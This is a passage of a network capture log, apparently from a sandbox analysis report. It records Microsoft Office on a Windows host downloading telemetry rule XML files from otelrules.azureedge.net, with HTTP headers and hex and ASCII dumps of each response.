                                                                                                                            Content-Length: 2284
                                                                                                                            Connection: close
                                                                                                                            Vary: Accept-Encoding
                                                                                                                            Vary: Accept-Encoding
                                                                                                                            Vary: Accept-Encoding
                                                                                                                            Vary: Accept-Encoding
                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:13 GMT
                                                                                                                            ETag: "0x8DC582BCD58BEEE"
                                                                                                                            x-ms-request-id: b738acd5-401e-0067-1502-1709c2000000
                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                            x-azure-ref: 20241006T115028Z-1657d5bbd48brl8we3nu8cxwgn00000002ag000000002ku9
                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                            X-Cache: TCP_HIT
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            2024-10-06 11:50:28 UTC2284INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 32 32 34 39 30 31 22 20 56 3d 22 31 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 4c 69 63 65 6e 73 69 6e 67 2e 4f 66 66 69 63 65 43 6c 69 65 6e 74 4c 69 63 65 6e 73 69 6e 67 2e 44 6f 4c 69 63 65 6e 73 65 56 61 6c 69 64 61 74 69 6f 6e 22 20 41 54 54 3d 22 63 31 61 30 64 62 30 31 32 37 39 36 34 36 37 34 61 30 64 36 32 66 64 65 35 61 62 30 66 65 36 32 2d 36 65 63 34 61 63 34 35 2d 63 65 62 63 2d 34 66 38 30 2d 61 61 38 33 2d 62 36 62 39 64 33 61 38 36 65 64 37 2d 37 37 31 39 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 43 65 6e 73 75 73 22 20 54 3d 22 55 70 6c 6f 61 64 2d 4d 65 64 69 75 6d 22
                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="224901" V="11" DC="SM" EN="Office.Licensing.OfficeClientLicensing.DoLicenseValidation" ATT="c1a0db0127964674a0d62fde5ab0fe62-6ec4ac45-cebc-4f80-aa83-b6b9d3a86ed7-7719" SP="CriticalCensus" T="Upload-Medium"


                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                            133192.168.2.64987613.107.246.60443
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-10-06 11:50:28 UTC192OUTGET /rules/rule701200v1s19.xml HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Accept-Encoding: gzip
                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                            2024-10-06 11:50:28 UTC563INHTTP/1.1 200 OK
                                                                                                                            Date: Sun, 06 Oct 2024 11:50:28 GMT
                                                                                                                            Content-Type: text/xml
                                                                                                                            Content-Length: 1356
                                                                                                                            Connection: close
                                                                                                                            Vary: Accept-Encoding
                                                                                                                            Vary: Accept-Encoding
                                                                                                                            Vary: Accept-Encoding
                                                                                                                            Vary: Accept-Encoding
                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:38 GMT
                                                                                                                            ETag: "0x8DC582BDC681E17"
                                                                                                                            x-ms-request-id: 0480ed94-801e-00ac-5102-17fd65000000
                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                            x-azure-ref: 20241006T115028Z-1657d5bbd48jwrqbupe3ktsx9w000000023g00000000bp7g
                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                            X-Cache: TCP_HIT
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            2024-10-06 11:50:28 UTC1356INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 58 61 6d 6c 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 58 61 6d 6c 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20
                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Xaml" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenXaml" S="Medium" /> <F T="2">


                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                            134192.168.2.64987713.107.246.60443
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-10-06 11:50:28 UTC192OUTGET /rules/rule700201v1s19.xml HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Accept-Encoding: gzip
                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                            2024-10-06 11:50:28 UTC563INHTTP/1.1 200 OK
                                                                                                                            Date: Sun, 06 Oct 2024 11:50:28 GMT
                                                                                                                            Content-Type: text/xml
                                                                                                                            Content-Length: 1393
                                                                                                                            Connection: close
                                                                                                                            Vary: Accept-Encoding
                                                                                                                            Vary: Accept-Encoding
                                                                                                                            Vary: Accept-Encoding
                                                                                                                            Vary: Accept-Encoding
                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:50 GMT
                                                                                                                            ETag: "0x8DC582BE39DFC9B"
                                                                                                                            x-ms-request-id: b72ef555-401e-0067-78fe-1609c2000000
                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                            x-azure-ref: 20241006T115028Z-1657d5bbd48sdh4cyzadbb374800000001p000000000fr0h
                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                            X-Cache: TCP_HIT
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            2024-10-06 11:50:28 UTC1393INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 32 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 57 6f 72 64 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 57 6f 72 64 22
                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Word.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenWord"


                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                            135192.168.2.64987813.107.246.60443
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-10-06 11:50:28 UTC192OUTGET /rules/rule700200v1s19.xml HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Accept-Encoding: gzip
                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                            2024-10-06 11:50:28 UTC563INHTTP/1.1 200 OK
                                                                                                                            Date: Sun, 06 Oct 2024 11:50:28 GMT
                                                                                                                            Content-Type: text/xml
                                                                                                                            Content-Length: 1356
                                                                                                                            Connection: close
                                                                                                                            Vary: Accept-Encoding
                                                                                                                            Vary: Accept-Encoding
                                                                                                                            Vary: Accept-Encoding
                                                                                                                            Vary: Accept-Encoding
                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:43 GMT
                                                                                                                            ETag: "0x8DC582BDF66E42D"
                                                                                                                            x-ms-request-id: db28c537-d01e-0065-47fe-16b77a000000
                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                            x-azure-ref: 20241006T115028Z-1657d5bbd48xdq5dkwwugdpzr000000002bg000000000727
                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                            X-Cache: TCP_HIT
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            2024-10-06 11:50:28 UTC1356INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 32 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 57 6f 72 64 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 57 6f 72 64 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20
                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Word" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenWord" S="Medium" /> <F T="2">


                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                            136192.168.2.64987913.107.246.60443
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-10-06 11:50:29 UTC192OUTGET /rules/rule702351v1s19.xml HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Accept-Encoding: gzip
                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                            2024-10-06 11:50:29 UTC563INHTTP/1.1 200 OK
                                                                                                                            Date: Sun, 06 Oct 2024 11:50:29 GMT
                                                                                                                            Content-Type: text/xml
                                                                                                                            Content-Length: 1395
                                                                                                                            Connection: close
                                                                                                                            Vary: Accept-Encoding
                                                                                                                            Vary: Accept-Encoding
                                                                                                                            Vary: Accept-Encoding
                                                                                                                            Vary: Accept-Encoding
                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
                                                                                                                            ETag: "0x8DC582BE017CAD3"
                                                                                                                            x-ms-request-id: cb759915-201e-003f-5f03-176d94000000
                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                            x-azure-ref: 20241006T115029Z-1657d5bbd48jwrqbupe3ktsx9w000000022g00000000d9yc
                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                            X-Cache: TCP_HIT
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            2024-10-06 11:50:29 UTC1395INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 6f 69 63 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 6f 69 63
                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702351" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Voice.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVoic


                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                            137192.168.2.64988013.107.246.60443
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-10-06 11:50:29 UTC192OUTGET /rules/rule702350v1s19.xml HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Accept-Encoding: gzip
                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                            2024-10-06 11:50:29 UTC563INHTTP/1.1 200 OK
                                                                                                                            Date: Sun, 06 Oct 2024 11:50:29 GMT
                                                                                                                            Content-Type: text/xml
                                                                                                                            Content-Length: 1358
                                                                                                                            Connection: close
                                                                                                                            Vary: Accept-Encoding
                                                                                                                            Vary: Accept-Encoding
                                                                                                                            Vary: Accept-Encoding
                                                                                                                            Vary: Accept-Encoding
                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:54 GMT
                                                                                                                            ETag: "0x8DC582BE6431446"
                                                                                                                            x-ms-request-id: 84e7aa3f-c01e-008e-74ff-167381000000
                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                            x-azure-ref: 20241006T115029Z-1657d5bbd48sdh4cyzadbb374800000001qg00000000d0kk
                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                            X-Cache: TCP_HIT
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            2024-10-06 11:50:29 UTC1358INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 6f 69 63 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 6f 69 63 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20
                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702350" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Voice" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVoice" S="Medium" /> <F T="2">


                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                            138192.168.2.64988213.107.246.60443
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-10-06 11:50:29 UTC192OUTGET /rules/rule701250v1s19.xml HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Accept-Encoding: gzip
                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                            2024-10-06 11:50:29 UTC563INHTTP/1.1 200 OK
                                                                                                                            Date: Sun, 06 Oct 2024 11:50:29 GMT
                                                                                                                            Content-Type: text/xml
                                                                                                                            Content-Length: 1358
                                                                                                                            Connection: close
                                                                                                                            Vary: Accept-Encoding
                                                                                                                            Vary: Accept-Encoding
                                                                                                                            Vary: Accept-Encoding
                                                                                                                            Vary: Accept-Encoding
                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
                                                                                                                            ETag: "0x8DC582BE022ECC5"
                                                                                                                            x-ms-request-id: 76165599-601e-000d-1a02-172618000000
                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                            x-azure-ref: 20241006T115029Z-1657d5bbd48cpbzgkvtewk0wu000000001y000000000e4na
                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                            X-Cache: TCP_HIT
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            2024-10-06 11:50:29 UTC1358INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 69 73 69 6f 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 69 73 69 6f 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20
                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701250" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Visio" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVisio" S="Medium" /> <F T="2">


                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                            139192.168.2.64988113.107.246.60443
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-10-06 11:50:29 UTC192OUTGET /rules/rule701251v1s19.xml HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Accept-Encoding: gzip
                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                            2024-10-06 11:50:29 UTC563INHTTP/1.1 200 OK
                                                                                                                            Date: Sun, 06 Oct 2024 11:50:29 GMT
                                                                                                                            Content-Type: text/xml
                                                                                                                            Content-Length: 1395
                                                                                                                            Connection: close
                                                                                                                            Vary: Accept-Encoding
                                                                                                                            Vary: Accept-Encoding
                                                                                                                            Vary: Accept-Encoding
                                                                                                                            Vary: Accept-Encoding
                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:41 GMT
                                                                                                                            ETag: "0x8DC582BDE12A98D"
                                                                                                                            x-ms-request-id: 03c3f781-101e-000b-56fe-165e5c000000
                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                            x-azure-ref: 20241006T115029Z-1657d5bbd48q6t9vvmrkd293mg00000001x0000000008t0w
                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                            X-Cache: TCP_HIT
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            2024-10-06 11:50:29 UTC1395INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 69 73 69 6f 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 69 73 69
                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701251" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Visio.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVisi


                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                            140192.168.2.64988313.107.246.60443
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-10-06 11:50:29 UTC192OUTGET /rules/rule700051v1s19.xml HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Accept-Encoding: gzip
                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                            2024-10-06 11:50:29 UTC563INHTTP/1.1 200 OK
                                                                                                                            Date: Sun, 06 Oct 2024 11:50:29 GMT
                                                                                                                            Content-Type: text/xml
                                                                                                                            Content-Length: 1389
                                                                                                                            Connection: close
                                                                                                                            Vary: Accept-Encoding
                                                                                                                            Vary: Accept-Encoding
                                                                                                                            Vary: Accept-Encoding
                                                                                                                            Vary: Accept-Encoding
                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                                                                                                            ETag: "0x8DC582BE10A6BC1"
                                                                                                                            x-ms-request-id: 29f28342-e01e-003c-5d00-17c70b000000
                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                            x-azure-ref: 20241006T115029Z-1657d5bbd48sdh4cyzadbb374800000001t0000000007xuc
                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                            X-Cache: TCP_HIT
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            2024-10-06 11:50:29 UTC1389INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 30 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 55 58 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 55 58 22 20 53 3d 22
                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700051" V="1" DC="SM" EN="Office.Telemetry.Event.Office.UX.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenUX" S="


                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                            141192.168.2.64988513.107.246.60443
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-10-06 11:50:30 UTC192OUTGET /rules/rule700050v1s19.xml HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Accept-Encoding: gzip
                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                            2024-10-06 11:50:30 UTC563INHTTP/1.1 200 OK
                                                                                                                            Date: Sun, 06 Oct 2024 11:50:30 GMT
                                                                                                                            Content-Type: text/xml
                                                                                                                            Content-Length: 1352
                                                                                                                            Connection: close
                                                                                                                            Vary: Accept-Encoding
                                                                                                                            Vary: Accept-Encoding
                                                                                                                            Vary: Accept-Encoding
                                                                                                                            Vary: Accept-Encoding
                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:28:01 GMT
                                                                                                                            ETag: "0x8DC582BE9DEEE28"
                                                                                                                            x-ms-request-id: a9a45936-c01e-00a1-54f1-167e4a000000
                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                            x-azure-ref: 20241006T115030Z-1657d5bbd48brl8we3nu8cxwgn000000027g000000009sv0
                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                            X-Cache: TCP_HIT
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            2024-10-06 11:50:30 UTC1352INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 30 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 55 58 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 55 58 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54
                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700050" V="1" DC="SM" EN="Office.Telemetry.Event.Office.UX" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenUX" S="Medium" /> <F T="2"> <O T


                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                            142192.168.2.64988613.107.246.60443
                                                                                                                            TimestampBytes transferredDirectionData
